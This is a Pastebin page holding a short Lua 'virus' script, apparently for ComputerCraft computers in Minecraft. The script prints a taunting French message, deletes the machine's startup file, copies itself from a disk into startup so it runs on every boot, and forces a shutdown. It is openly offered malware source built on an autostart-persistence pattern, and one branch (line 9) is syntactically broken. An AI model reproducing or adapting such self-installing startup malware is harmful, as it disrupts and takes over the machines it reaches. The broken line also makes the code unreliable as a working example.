Advertisement
fantadada

virus 2 computercraf

Aug 6th, 2015
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.23 KB | None | 0 0
  1. term.clear()
  2. print ("votre ordi est infecter AHAH")
  3. if fs.exists("startup") == true then
  4. fs.delete("startup")
  5. fs.copy("disk/virus", "startup")
  6. sleep(2)
  7. os.shutdown()
  8. else
  9. fs.("dopy/virus","startup")
  10. sleep(2)
  11. os.shutdown()
  12. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement